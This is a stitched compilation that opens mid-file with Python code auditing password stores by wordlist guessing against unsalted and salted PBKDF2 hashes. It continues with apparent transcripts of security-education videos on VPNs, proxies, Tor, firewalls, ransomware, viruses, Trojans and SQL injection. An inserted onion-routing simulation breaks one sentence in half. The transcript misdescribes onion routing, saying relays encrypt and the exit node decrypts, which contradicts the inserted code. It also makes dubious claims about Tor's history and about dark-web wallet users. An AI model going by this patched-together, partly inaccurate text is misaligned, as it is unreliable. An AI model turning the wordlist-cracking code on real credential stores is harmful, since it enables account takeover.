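    return cracked, len(wordlist)


def audit_salted(store, wordlist, iterations=ITERATIONS):
    """The same wordlist against salted PBKDF2. The salt forces every guess to be recomputed
    per account, and each guess costs `iterations` HMAC evaluations. Returns the cracked
    accounts and the number of HMAC evaluations spent."""
    cracked, guesses = {}, 0
    for user, (salt, digest) in store.items():
        for word in wordlist:
            guesses += 1
            if hmac.compare_digest(salted_slow(word, salt, iterations), digest):
                cracked[user] = word
                break
    return cracked, guesses * iterations


if __name__ == "__main__":
    unsalted, salted = build_stores()
    print("unsalted:", audit_unsalted(unsalted, WORDLIST))
    print("salted:  ", audit_salted(salted, WORDLIST))
```

Both audits find the same two weak accounts, because a salt and a slow KDF do nothing against a password that is in the wordlist; what changes is the work. The unsalted store costs five hashes for all accounts together, while the salted store costs ten guesses each multiplied by the iteration count, and that multiplier is what turns a cheap audit into an expensive one for an attacker with a stolen database.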
It is used for network troubleshooting, analysis, software and communications protocol development, and education. It captures network traffic on the local network and stores the data for offline analysis. Wireshark captures network traffic from Ethernet, Bluetooth, wireless networks and frame relay connections.

Now that we have learned about the different types of tools that can be used when conducting an ethical hacking audit, let's learn about some potential benefits of such campaigns and why organizations prefer to pay for such audits. Being able to identify defects from an attacker's perspective is game changing, since it displays all the potential avenues of a possible hack. One can only prepare for the known vulnerabilities as a defensive specialist, but proactively trying to breach a network or device can make hackers think of techniques that no defense contractors can account for; this kind of unpredictability goes a long way in securing a network against malicious actors. Another advantage of hiring ethical hackers is the ability to preemptively fix possible weak points in a company's network infrastructure. As seen on many occasions, a real breach will cause loss of data and irreparable damage to the foundation of an organization; being able to gauge such shortcomings before they become public and can be exploited is a benefit most organizations make use of. This is not to imply that such security audits are only beneficial to the organization paying for them: when coming across companies that provide certain services, a reliable third-party security audit goes a long way in instilling trust and confidence in the craft. If the ethical hackers cannot find any major vulnerabilities that can be leveraged by hackers, it just accentuates the technical brilliance of the organization and its engineers, thereby increasing the clientele by a substantial amount.

Jude is waiting at the airport to hop on her flight back home when she realizes that she missed making an important bank payment. She
connects her laptop to the public Wi-Fi at the airport and goes ahead to carry out the bank transaction. Everything goes well and Jude completes her transaction. After a couple of days she was stunned when she learned that her bank account had been subjected to a cyber attack and a hefty amount was wiped from her account. After getting in touch with the bank authorities, she learned that her account was hacked at the airport; she didn't realize that the public Wi-Fi she used might have caused her this trouble. Jude wishes that, had her bank transfer escaped the hacker's eyes, she would not have been a victim of a cyber attack. Bank officials advised her to use a VPN for future transactions, especially when connecting to an open or public network. Like most of us, Jude had come across the term VPN several times but didn't know much about it, and little did she think that the repercussions of not using a VPN would be this bad.

Let's understand how the hacker would have exploited Jude's transaction in the absence of a VPN. In this process, Jude's computer first connects to the internet service provider (ISP), which provides access to the internet. She sends her details to the bank's server using her IP address; an Internet Protocol address, or IP address, is a unique address that identifies a particular device, be it a laptop or a smartphone, on the internet. When these details pass through the public network, the hacker, who passively watches the network traffic, intercepts them. This is a passive cyber attack, where the hacker collects Jude's bank details without being detected. More often than not, in such an attack payment information is likely to be stolen; the targeted data here are the victim's usernames, passwords and other personal information. The unsecured connection exposed Jude's IP address and bank details to the hacker when they passed through the public network.

So would Jude have been able to secure her transaction with the help of a VPN? Well, yes. Picture Jude's bank transaction to be happening in a
tunnel that is invisible to the hacker. In such a case, the hacker will not be able to spot the transaction, and that is precisely what a VPN does. A virtual private network, more often known as a VPN, creates a secure tunnel between your device and the internet. For using a VPN, Jude's first step would be to install a software-based technology known as the VPN client on her laptop or smartphone that would let her establish a secure connection. The VPN client connects to the Wi-Fi and then to the ISP. Here the VPN client encrypts Jude's information using VPN protocols; data is encrypted to make sure it is secure. Next, the VPN client establishes a VPN tunnel within the public network that connects to the VPN server. The VPN tunnel protects Jude's information from being intercepted by the hacker. Jude's IP address and actual location are changed at the VPN server to enable a private and secure connection. Finally, the VPN server connects to Jude's bank server in the last step, where the encrypted message is decrypted. This way, Jude's original IP address is hidden by the VPN, and the VPN tunnel protects your data from being hacked. This explains how a VPN makes your data anonymous and secure when it passes through the public network, and the difference between a normal connection and a VPN connection.

After learning about this, Jude was certain that she should start using a VPN to carry out her online transactions in the future. This is also applicable to each one of us: if you work remotely or connect to public Wi-Fi, using a VPN is the safest option. In addition to providing secure, encrypted data transfer, VPNs are also used to disguise your whereabouts and give you access to regional web content. VPN servers act as proxies on the internet; this way your actual location cannot be established. A VPN enables you to spoof your location by switching to a server in another country and thereby change your location. For example, by doing so you can watch content on Netflix that might be unavailable for
your region.

Meet Jonathan. He is an investigative journalist who occasionally researches and publishes news articles contrary to the government's ideologies. On one such occasion he could not access a global news website dealing with uncensored information; it seemed his IP was blocked from visiting the news website. With his IP blocked, Jonathan turned to a popular proxy service that was able to unblock the news website, thereby allowing an open internet to all users. Just like how your friend gives proxy attendance for you, a proxy server serves as a stand-in user to keep the real client private.

But what is a proxy? Let's understand how it works by taking a look at how Jonathan was able to access geo-blocked content without much hassle. A proxy server acts as a gateway or intermediary server between a user and its destination website. When Jonathan wasn't able to access the news website, he connected his system to a global proxy server. Once connected, the proxy server assigns a new IP address to Jonathan's system, an IP address of a different country where the website is not censored. Following this process, whenever Jonathan visits that website, the website administrators see the new IP address assigned via the proxy server and see no reason to deny access to their account. Once the proxy server is able to access the website, the content is passed on to Jonathan's system via the same channel.

Regarding access to proxy servers, you must first set one up on your computer, device or network. Next, check the steps required for your computer or network, as each operating system has its own setup procedure; in most cases, however, setup entails using an automated configuration script. There are plenty of free proxy services available on the internet; however, the safety of such proxies is rarely verified. Most free proxies will provide an IP address and a relevant port for connection purposes. Reputed proxy providers like Smartproxy and Bright Data that run on subscription models will most likely provide credentials
to log in with when establishing the connection. This extra step acts as authentication that verifies an existing subscription on the proxy provider's server, unlike free providers that are open to all.

When it comes to hiding IP addresses, many people consider a VPN to be the primary solution. While that's true up to some extent, there are a few things proxies do differently. In the case of VPNs, extra encryption is also carried out to create a secure tunnel between the user's device and a VPN server. A VPN is usually much faster, more secure thanks to multiple layers of encryption, and has little to no downtime. Proxies tend to be comparatively unsafe, with the service owners having the exact IP address of the end user and giving no guarantees regarding downtime and reliability. If you want to know more about how VPNs work, do watch how Jude could have protected her banking credentials using VPNs in our detailed video linked above.

Now let's take a small quiz to check how much we have learned. What can a VPN connection provide that a proxy service cannot? A: a new IP address. B: multiple layers of encryption. C: access to geo-blocked content. D: authentication credentials. Think about it and leave your answers below in the comments section, and three lucky winners will receive Amazon gift vouchers.

What about the benefits of a proxy service, though? Besides allowing access to blocked content, proxies can serve as an efficient firewall system. They can also filter content from third-party websites, allowing control over internet usage. In many cases browsing speeds are stabilized compared to vanilla internet, thanks to proper optimization on the base proxy server. The element of privacy proxies provide is highly lucrative to people looking to hide their actual IP address from as many prying eyes as possible. One can easily argue the benefits of using VPNs over proxies for added security measures; however, a few basic tasks don't warrant maximum privacy on the user's side as in other cases. For example, many
consumers worldwide find proxy services more convenient, since all major operating systems, from Windows to Android, allow proxy configuration without the hassle of installing new applications, as is the case with a VPN. In addition, there are services online that function as web proxies, allowing users to access blocked content without any setup from their end; they can enter the target URL and the web proxy will route data from its physical server. This level of freedom is hard to come by in the case of VPNs, making proxies an ideal solution for casual browsing.

With the next generation of internet exchanges focused on maximum privacy and security, a variety of ways have been enforced to maintain them. As such, censorship has shifted from the streets to the digital domain, forcing the standard citizen to derive alternative ways to maintain anonymity. A major weapon in this battle for privacy and security is the Tor Browser, an independent browser meant to browse the internet while relaying information through the Tor Network. It serves as a meaningful alternative to standard internet browsing habits. To better understand the purpose of this browser and such, we must learn about the working of the Tor Network. Featuring its own routing protocol, the Tor Browser is an easy way to maintain anonymity while browsing without emptying one's wallet.

Let's take a look at the topics to be covered today. We start with an explanation of what the Tor Network is and its significance in the working of the Tor Browser. We take a look at the onion routing protocol and how it transmits data from client devices to the Tor directories in order to circumvent government censorship. Moving on, we learn a few features of the Tor Browser and the distinct advantages the Tor Network provides. Next, we learn the difference between using a VPN and Tor to anonymize internet usage, and finally we have a live demonstration of the Tor Browser's anonymization features in action. Let's move on to learning about
the Tor Network. Tor, short for The Onion Router, is an open source privacy network that permits users to browse the web anonymously. Tor was initially developed and solely used by the US Navy to protect sensitive government communications before the network was made publicly available. The digital era has disrupted the traditional way of doing things in every sector of the economy; the rapid rise in development and innovation of digital products has given way to frequent data breaches and cyber thefts. In response, consumers are increasingly opting for products that offer data privacy and cyber security. Tor is one such underground network that was implemented for the purpose of protecting users' identities. The Tor Network is one example of the many emerging technologies that attempt to fill a data privacy void in a digital space plagued by cyber security concerns.

The Tor Network intercepts the traffic from your browser and bounces a user's request off a random number of other user IP addresses; then the data is passed to the user's requested final destination. These random users are volunteer devices which are called nodes or relays. The Tor Network disguises your identity by encrypting the traffic and moving it across different Tor relays within the network. The Tor Network uses an onion routing technique for transmitting data, hence the original name of The Onion Router. To operate within the Tor Network, a user has to install the Tor Browser; any address or information requested using the browser is transmitted through the Tor Network. It has its own feature set, which we will be covering later in this video.

As we discussed already, the data passing through the Tor Network must follow a unique protocol known as the onion routing protocol. Let us learn more about its unique characteristics. In our normal network usage, the data is transmitted directly: the sender has a data package to transmit, which is done directly over a line of communication with either a receiving party
or a server of some kind. However, since the data can easily be captured while being transmitted, the security of this exchange is not very reliable. Moreover, it becomes very easy to trace the origin of such requests. On many occasions, websites with questionable and controversial content are blocked by the ISP; this is possible since the ISP is able to detect and spy on user information passing through the network. Apart from ISPs, there is a steady chance of your private information being intercepted by hackers. Unfortunately, easy detection of the source and contents of a web request makes the entire network extremely vulnerable for people who seek anonymity over the internet.

In the onion routing protocol, however, things take a longer route. We have a sender with the Tor Browser installed on the client system. The network sends the information to node 1's IP address, which encrypts the information and passes it on to node 2's address, which performs another encryption and passes it on to node 3's address. This is the last address, which is also known as the exit node. This last node decrypts the encrypted data and finally relays the request to the final destination, which can be another device or a server. This final address thinks the request came from the exit node and grants access to it. The encryption process across multiple computers repeats itself from the exit node back to the original user. The Tor Network obfuscates user IP addresses from unwanted surveillance by keeping the user's request untraceable; with multiple servers touching the data, it makes tracking very difficult for both ISPs and malicious attackers.

Now that we understand the way Tor works, let us learn more about the Tor Browser. The Tor Browser was developed by a non-profit organization as a part of the Tor Project in 2008, when its first public release was announced. The Tor Browser is a browser forked from the popular Firefox that anonymizes your web traffic using the Tor Network. If you are investigating a
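The VPN tunnel in Jude's story and the onion route just described can be simulated side by side. The Python example below is added here and is not code from the video, from the Tor Project or from any VPN vendor. It uses a small HMAC-SHA256 counter-mode stream cipher with an authentication tag as a stand-in for the real VPN and Tor ciphers, names the relays node1, node2 and exit, sends a constructed bank request to the constructed hostname bank.example, and follows the standard onion layout in which the client wraps one encryption layer per relay and each relay removes exactly one. A passive observer records every frame that crosses the public network, and the demo reports on which segments the plaintext request was visible.

```python
import base64
import hashlib
import hmac
import json
import os

NONCE_LEN = 16
TAG_LEN = 32


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    # HMAC-SHA256 used as a PRF in counter mode: a toy stand-in for a real stream cipher.
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def encrypt(key: bytes, plaintext: bytes) -> bytes:
    # Fresh nonce per frame, XOR with the keystream, then a tag over nonce and ciphertext.
    nonce = os.urandom(NONCE_LEN)
    ct = bytes(p ^ k for p, k in zip(plaintext, keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def decrypt(key: bytes, blob: bytes) -> bytes:
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    if not hmac.compare_digest(hmac.new(key, nonce + ct, hashlib.sha256).digest(), tag):
        raise ValueError("authentication tag mismatch: frame was tampered with")
    return bytes(c ^ k for c, k in zip(ct, keystream(key, nonce, len(ct))))


def send_plain(request: bytes, observer: list) -> bytes:
    observer.append(request)        # one segment, client to bank, in the clear
    return request


def send_via_vpn(request: bytes, vpn_key: bytes, observer: list) -> bytes:
    frame = encrypt(vpn_key, request)   # VPN client encrypts before the packet leaves the laptop
    observer.append(frame)              # the observer on the public Wi-Fi sees only ciphertext
    return decrypt(vpn_key, frame)      # VPN server decrypts and forwards to the bank


def wrap_onion(request: bytes, route: list, destination: str) -> bytes:
    """Client side: innermost layer is for the exit node and names the destination; every
    outer layer names only the next relay and carries the still-encrypted inner onion."""
    names = [name for name, _ in route]
    innermost = {"next": destination, "payload": base64.b64encode(request).decode()}
    blob = encrypt(route[-1][1], json.dumps(innermost).encode())
    for i in range(len(route) - 2, -1, -1):
        layer = {"next": names[i + 1], "payload": base64.b64encode(blob).decode()}
        blob = encrypt(route[i][1], json.dumps(layer).encode())
    return blob


def peel(key: bytes, blob: bytes):
    # Relay side: remove one layer and learn only the next hop plus an opaque payload.
    layer = json.loads(decrypt(key, blob))
    return layer["next"], base64.b64decode(layer["payload"])


def send_via_onion(request: bytes, route: list, destination: str, observer: list):
    blob = wrap_onion(request, route, destination)
    relays_saw = {}
    for name, key in route:
        observer.append(blob)           # frame on the wire before this relay peels it
        next_hop, blob = peel(key, blob)
        relays_saw[name] = next_hop
    observer.append(blob)               # exit node to destination: plaintext again
    return blob, relays_saw


def run_demo() -> dict:
    request = b"POST /transfer amount=500 to=ACC-12345"   # constructed sample request
    vpn_key = os.urandom(32)
    route = [("node1", os.urandom(32)), ("node2", os.urandom(32)), ("exit", os.urandom(32))]
    plain_obs, vpn_obs, onion_obs = [], [], []
    delivered_plain = send_plain(request, plain_obs)
    delivered_vpn = send_via_vpn(request, vpn_key, vpn_obs)
    delivered_onion, relays_saw = send_via_onion(request, route, "bank.example", onion_obs)
    return {
        "plain_exposed": [request in f for f in plain_obs],
        "vpn_exposed": [request in f for f in vpn_obs],
        "onion_exposed": [request in f for f in onion_obs],
        "all_delivered": delivered_plain == delivered_vpn == delivered_onion == request,
        "relays_saw": relays_saw,
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

run_demo() shows three things a defender cares about: on the plain connection the observer reads the request on the only segment; with the VPN layer the observer sees ciphertext only, but the VPN server decrypts it, so trust moves to the provider; and on the onion route each relay learns just the next hop, while the final segment from the exit node to the destination carries plaintext again, which is why end-to-end TLS is still needed over Tor.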
competitor, researching an opposing litigant in a legal dispute, or just think it's creepy for your ISP or the government to know what websites you visit, the Tor Browser might be the right solution. Before the Tor Browser was developed, using the Tor network to maintain anonymity was a huge task for everyday consumers: starting from the setup to the usage, the entire process demanded a lot of knowledge and practice. The Tor Browser managed to make it easy for users to traverse the relay servers in Tor and guarantee the privacy of the data exchange.

A major feature of the Tor Browser is the ability to delete all browser history, cookies and tracking data the moment it is closed. Every new launch of the browser opens an empty slate, preventing usage habits from being tracked and singled out. A major feature that is the highlight of the Tor network is the availability of onion links. Only a small portion of the World Wide Web is available to the general public. We have the deep web, which contains links that are not allowed to be indexed by standard search engines like Google and Bing. The dark web is a further subset of the deep web which contains onion links. Tor Browser gives you access to these .onion websites, which are only available within the Tor network. .onion is a special-use top-level domain which designates an anonymous onion service, which is also known as a hidden service. Similar to the links of the deep web, these onion links provide services like online shopping, cryptocurrency and many other products not available in the consumer internet space. Often being considered a haven for illegal activities and sales, onion links provide both information and assets in a private manner without the risk of spying by authorities. Browsing the web over Tor is slower than the clear net due to the multiple layers of encryption, and some web services also block Tor users. Tor Browser is also illegal in authoritarian regimes that want to prevent citizens from reading, publishing and communicating anonymously. Journalists and dissidents around the world have embraced Tor as a cornerstone of democracy, and researchers are hard at work at improving Tor's anonymity properties.

Let us take a look at some of the advantages of using the Tor Browser over standard web browsers. The highlight of using the Tor Browser is to maintain anonymity over the internet. The cause for such requests can differ from person to person, but all of these concerns are answered by the Tor network: routing the information via multiple nodes and relay servers makes it entirely difficult for the ISP to keep track of usage data. The entire Tor Project is designed to be completely free and open source; allowing the code for the browser to be inspected and audited by third parties helps in the early detection of faulty configurations and critical bugs. It is present for multiple operating systems, starting from laptops to mobile devices. A number of websites are blocked by governments for a variety of reasons, and journalists under authoritarian regimes have difficulty in getting the word out regarding the situation. Since the onion routing protocol transfers data between multiple servers in random countries, the domains being blocked become available when used via Tor. Usage of these encrypted messaging platforms is easily enforced using the Tor Browser, which otherwise would have been a difficult task under oppressive circumstances.

Many people believe that a VPN offers the same benefits as the Tor Browser. Let's put both of them to the test and see the differences between them. Coming to the first point of difference, Tor is completely free and open source: all of the code for the browser and the network can be audited and has been cleared for security concerns. When it comes to VPNs, there are many different brands which have open-source clients, but the same cannot be said for their counterparts; some have partly open source, while some have completely locked up their code so that they cannot be
audited further. Moving on, Tor has multiple relay points in its data transfer protocol: between the server and the receiver there are three different IP nodes. That number can increase, but it will always be more than two. Once the data is passed from the sender it goes through all of those relay points, while in the case of a VPN the connection is made from the client device to the VPN server and then to the requested destination; there is no other IP node that comes into work here, thereby making the connection one-to-one between the client and the VPN. As a next point, since Tor handles multiple layers of encryption and the data passes through multiple systems along the way, the performance is slow compared to a VPN, where the performance is relatively fast due to the lower number of nodes the data passes through. Similarly, the multi-layer encryption of Tor is consistent: if you use Tor Browser, every single request passes through the same layers of encryption and follows the same routing protocol, whereas in the case of a VPN different companies offer different levels of encryption; some have multi-hop, some prefer a single one-to-one connection, and these kinds of differences make the choice much more variable. Finally, the nodes and relays being used in the Tor network are volunteered; there is no company holding over them, so jurisdiction becomes relatively straightforward. For instance, in the case of VPNs, many such VPNs are hosted by adware companies or are being monitored by central governments to note the usage information.

Now that we have a better understanding of the Tor Browser and its routing, let us take a look at how the Tor Browser can anonymize and protect our internet usage. When opening up the Tor Browser for the first time, this is the page that you are going to be welcomed with. You have the option of connecting to the Tor network before we start our browsing, so let's press connect, and we can see that it is connected. Coming to the anonymization, let's check my current location on Google Chrome: currently it is showing as Navi Mumbai in Maharashtra. If we check the same link on the Tor Browser we should get a different address. Now, every link that we open in the Tor Browser will be a little delayed and the speed will be hampered because of the multiple layers of encryption, like we discussed. Now, as you can see, it's showing a German IP and the state of Bavaria. This is how the anonymization works: there is no VPN configured, there is no proxy attached, it's straight up the out-of-the-box settings that come inbuilt with the Tor Browser. Similarly, we have an option of cleaning up the data. Let's say you want to refresh your location and you want to use a different identity for the next browsing session: if we just restart it once and check it again, we should be seeing a different country this time. As you can see, we have Netherlands right now. So this is how we can keep refreshing your address; you can keep refreshing your host location so that it cannot be tracked when browsing the internet.

Like we discussed, we have some onion links that can only be used on the Tor network. As you can see, these kinds of links do not open in the Google Chrome browser, but once we copy these over to the Tor Browser, as you can see, we have opened the Hidden Wiki, which is available only on the Tor network. This is kind of an alternative Wikipedia website where we can find articles to read and more information to learn. Similarly, we have another onion link over here, which is once again available only for the Tor Browser. Now, these kinds of delays are expected, but they are a valid compromise because they maintain the anonymity that many people desire. Similarly, we have found a hidden wallet, which is a cryptocurrency wallet specifically for dark web members. This operates over the Tor network, and this is used mostly by journalists and people who want to anonymize their internet transactions when it comes to dealing with money. All of the transactions that occur over the Tor
network are almost impossible to track; therefore these kinds of cryptocurrency wallets are very big on the deep web. This is just one example, while having multiple different wallets for every single cryptocurrency available.

Imagine our houses without a fence or boundary wall. This would make our property easily accessible to trespassers and robbers and place our homes at great risk, right? Hence fencing our property helps safeguard it and keeps trespassers at bay. Similarly, imagine our computers and networks without protection; this would increase the probability of hackers infiltrating our networks. To overcome this challenge, just like how boundary walls protect our houses, a virtual wall helps safeguard and secure our devices from intruders, and such a wall is known as a firewall. Firewalls are security devices that filter the incoming and outgoing traffic within a private network. For example, if you were to visit your friend who lives in a gated community, you would first take permission from the security guard. The security guard would check with your friend whether you should be allowed entry or not; if all is well, your access is granted. On the other hand, the security guard would not grant permission to a trespasser looking to enter the same premises. Here the entry access depends solely on your friend the resident's discretion. The role of the security guard in this case is similar to that of a firewall. The firewall works like a gatekeeper at your computer's entry point which only welcomes incoming traffic that it has been configured to accept. Firewalls filter the network traffic within your network and analyze which traffic should be allowed or restricted based on a set of rules, in order to spot and prevent cyber attacks.

Your computer communicates with the internet in the form of network packets that hold details like the source address, destination address and information. These network packets enter your computer through ports. A firewall works on a set of rules based on the details of these network packets, like their source address, destination address, content and port numbers. Only trusted traffic sources or IP addresses are allowed to enter your network. When you connect your computer to the internet there is a high chance of hackers infiltrating your network; this is when a firewall comes to your rescue by acting as a barrier between your computer and the internet. The firewall rejects the malicious data packet and thus protects your network from hackers. On the other hand, traffic from trusted websites is allowed access to your network. This way a firewall carries out quick assessments to detect malware and other suspicious activities, thereby protecting your network from being susceptible to a cyber attack.

Firewalls can either be hardware or software. Software firewalls are programs installed on each computer; this is also called a host firewall. Meanwhile, hardware firewalls are equipment that is established between the gateway and your network; Linksys routers are a good example of a hardware firewall. Besides this, there are other types of firewalls designed based on their traffic filtering methods, structure and functionality. The firewall that compares each outgoing and incoming network packet to a set of established rules, such as the allowed IP addresses, IP protocols, port numbers and other aspects of the packet, is known as a packet filtering firewall; if the incoming network traffic does not match the predefined rules, that traffic is blocked. A variant of the packet filtering firewall is the stateful inspection firewall. These types of firewalls not only examine each network packet but also check whether or not that network packet is part of an established network connection; such firewalls are also referred to as dynamic packet filtering firewalls. Our next type of firewall is called a proxy firewall. This draws a close comparison to how you give proxy attendance for a friend: like how you take the authority to represent your friend, the proxy firewall
pretends to be you and interacts with the internet. They come between you and the internet and thereby prevent direct connections. This protects your device's identity and keeps the network safe from potential attacks. Only if the incoming data packet contents are protected does the proxy firewall transfer it to you. They are also known as application-level gateways. The firewall can spot malicious actions and block your computer from receiving data packets from harmful sources. In addition to preventing cyber attacks, firewalls are also used in educational institutions and offices to restrict users' access to certain websites or applications; it is used to avoid access to unauthorized content.

It's the year 2015 and Richard has just finished playing games on his computer. After a long gaming session, Richard tries to shut it down, then finds some random text file on the desktop that says "ransom note". The text file mentioned how a hacking group had encrypted Richard's game files and private documents and he had to pay a ransom of 500 worth of Bitcoin to the specified Bitcoin address. Richard quickly checked his files only to see them encrypted and unreadable. This is the story of how the TeslaCrypt ransomware spread in 2015, which affected thousands of gamers before releasing the master key used for encrypting the files.

So what is ransomware? For Richard to be targeted by such an attack, he must have installed applications from untrusted sources or clicked an unverified link; both of them can function as gateways for a ransomware breach. Ransomware is a type of malware that encrypts personal information and documents while demanding a ransom amount to decrypt them. This ransom payment is mainly done using cryptocurrency to ensure anonymity, but can also employ other routes. Once the files are encrypted or locked behind a password, a text file is made available to the victim explaining how to make the ransom payment and unlock the files, just like Richard found the ransom note text file on his desktop. Even after the money has been paid there's no guarantee that the hackers will send the decryption key or unlock the files, but in certain sensitive situations victims make the payment hoping for the best. Having never been introduced to ransomware attacks before, this gave Richard an opportunity to learn more about this, and he began his research on the topic.

The spread of ransomware mostly starts with phishing attacks. To know more about phishing attacks, click the link in the button above. Users tend to click on unknown links received via emails and chat applications promising rewards of some nature; once clicked, a ransomware file is installed on the system that encrypts all the files or blocks access to computer functions. They can also be spread via malware transmitted via untrusted application installation or even a compromised wireless network. Another way to breach a system with ransomware is by using Remote Desktop Protocol, or RDP, access. A computer can be accessed remotely using this protocol, allowing a hacker to install malicious software on the system with the owner unaware of these developments.

Coming to the different types of ransomware: first we have locker ransomware, which is the type of malware that blocks standard computer functions from being accessed until the payment to the hackers is complete. It shows a lock screen that doesn't allow the victim to use the computer for even basic purposes. Another type is crypto ransomware, which encrypts the local files and documents in the computer. Once the files are encrypted, finding the decryption key is impossible unless the ransomware variant is old and the keys are already available on the internet. Scareware is fake software that claims to have detected a virus or other issue on your computer and directs you to pay to resolve the problem. Some types of scareware lock the computer, while others simply flood the screen with pop-up alerts without actually damaging files. To prevent getting affected by ransomware,
Richard could have followed a few steps to further enhance his security. One must always have backups of their data; cloud storage for backup is easy, but a physical backup on a hard drive is always recommended. Keeping the system updated with the latest security patches is always a good idea. Apart from system updates, one must always have reputed antivirus software installed; many antivirus products like Kaspersky and Bitdefender have anti-ransomware features that periodically check for encryption of private documents. When browsing the internet, a user must always check for the lock symbol on the address bar, which signifies the presence of the HTTPS protocol for additional security. If a system is infected with ransomware already, there is a website, nomoreransom.org; it has a collection of decryption tools for most well-known ransomware packages. It can also help decrypt specific encrypted files if the list of anti-ransomware tools didn't help the victim.

Malware is malicious software that is programmed to cause damage to a computer system, network and hardware devices. Many malicious programs like Trojans, viruses, worms and bots which cause damage to the system are known as malware. Most malware programs are designed to steal information from the targeted user or to steal money from the target by stealing sensitive data. Let's take a look at the introduction for two different types of malware: virus and Trojan. Firstly, let's take a look at what exactly a virus program is. A computer virus is a type of malicious program that on execution replicates itself. They get attached to different files and programs, which are termed host programs, by inserting their code; if the attachment succeeds, the targeted program is termed infected with a computer virus. Now let's take a look at the Trojan horse. A Trojan horse program is a program that disguises itself as a legitimate program but harms a system on installation. They hide within the attachments in emails, then transfer from one system to another.

They create backdoors into a system to allow the cyber criminal to steal our information. Let's take a look at how they function after getting installed into a system. Firstly, we have virus programs. The computer virus must contain two parts to infect the system: first is a search routine, which locates new files and data that are to be infected by the virus program, and the second part is known as the copy routine, which is necessary for the program to copy itself into the targeted file which is located by the search routine. Now let's take a look at the Trojan horse functioning. For Trojan horses, the entryway into our system is through emails that may look legitimate but may have unknown attachments, and when such files are downloaded onto the device the Trojan program gets installed and infects the system. They also infect the system on the execution of an infected application or executable file and attack the system.

Now that we understand what viruses and Trojans are, let's understand the different types of viruses and Trojans. Let's take a look at different types of viruses. The first one is known as the boot sector virus. This type of virus damages the booting section of the system by infecting the master boot record, which is also known as the MBR; this damages the boot sector by targeting the hard disk of the system. Then we have the macro virus. A macro virus is a type of virus that gets embedded into document-related data and is executed when the file is opened. They are also designed to replicate themselves and infect the system on a larger scale. And lastly we have the direct action virus. This type of virus gets attached to executable files, which on execution activates the virus program and infects the system. Once the infection of the file is completed they exit the system, which is also the reason it is known as a non-resident virus. Let's take a look at different types of Trojans. The first type of Trojan is the backdoor. They are designed to create a backdoor in the system on execution
of an infected program; they provide remote access to a system for the hacker. This way the cyber criminal can steal our system data and may use it for illegal activities. Next we have the clicker Trojan. They enter the system by clicking the random pop-ups which we come across on the internet. They tempt the user to give their personal details for different transactions or schemes, which may provide remote access to a system to the cyber criminal. And the last Trojan type is the ransom Trojan. This type of Trojan program, after entering the system, blocks the user from accessing their own system and also affects the system function; the cyber criminal demands a ransom from the targeted user for the removal of the Trojan program from the device.

Now that we understand some details regarding viruses and Trojans, let's solve a question. The question is: Jake was denied access to his system and he wasn't able to control the data and information in the system. Now the actual question is, what could be the reason behind the system's problem? Option A: macro virus. Option B: ransom Trojan. Option C: backdoor Trojan. Give your answers in the comment section.

Now let's understand how to detect the activity of viruses and Trojans in our system. To detect virus or Trojan activity in a system we can refer to the following points. For viruses we have slowing down of the system, and frequent application freezes show that a virus infection is present in the system. Then we have that viruses can also steal sensitive data, including passwords and account details, which may lead to unexpected logout from the accounts or corruption of the sensitive data. And lastly we have frequent system crashes due to virus infection, which damages the operating system. For Trojans we have frequent system crashes, and the system also faces slow reaction time. Then we have more random pop-ups from the system, which may indicate Trojan activity. And lastly we have modification of the system applications, and a change of the desktop appearance can also be due to the infection of a Trojan program.

Next let's take a look at a famous cyber attack for viruses and Trojans. For the virus we have the MyDoom virus, which was identified in the year 2004 and affected over 50 million systems by creating a network sending spam emails, which was to gain backdoor access into our systems. Next, for the Trojan horse we have the Emotet Trojan program, which is specifically designed for financial theft and for stealing bank-related information. Next we have a few points on how to prevent virus entry or a Trojan attack on a system. The most basic way of virus protection is to use antivirus and do regular virus scans; this will prevent virus entry into the system, and also having more than one antivirus provides much better protection. Then, avoiding visiting uncertified websites can also prevent virus entry into a system. Then we have using regular driver updates and system updates to prevent virus entry. For Trojans we have using certified software from legal sites to prevent any Trojan activity in our system, and also avoiding clicking random pop-ups that we often see on the internet. And lastly, using antivirus and firewalls for protection against Trojan horses is a good habit.

Now that we have reached the end of the video, let's take a look at what we learned. For the first part we saw the main objective of the virus is to harm the data and information in a system, whereas for the Trojan we have stealing of the data files and information. The effect of viruses is more drastic in comparison to Trojan horses. Then we have viruses, which are non-remote programs, whereas Trojan horses are remotely accessed. And lastly, viruses have the ability to replicate themselves to harm multiple files, whereas Trojans do not have the replication ability.

So let's begin with what SQL injection is. As the name suggests, a SQL injection vulnerability allows an attacker to inject malicious input into a SQL statement. SQL stands for Structured Query Language, which is a
language used by an application to interact with the database. Now, normally this attack is targeted towards a database to extract the data that is stored within; however, the vulnerability does not lie in the database itself. The vulnerability will always lie in the application. It is the developer's prerogative how to develop the application, how to configure it to prevent SQL injection queries from happening. A database is created to answer questions, and if a question is asked it is supposed to answer it. The database needs to be configured for some amount of security, but the vulnerability, the flaw here for SQL injection, will always lie in the application itself. It is how the application interacts with the database that needs to be modified, that needs to be maintained by the developer, rather than just configuring the database itself. So the attacker at this point in time, when they send a query to the application, will form a malformed query by injecting a particular command or an operator that is recognized by the SQL language, and if that operator is passed through the application to the database then the database basically gets cracked or does a data dump because of that unwanted character coming in. So this character needs to be filtered at the application level itself.

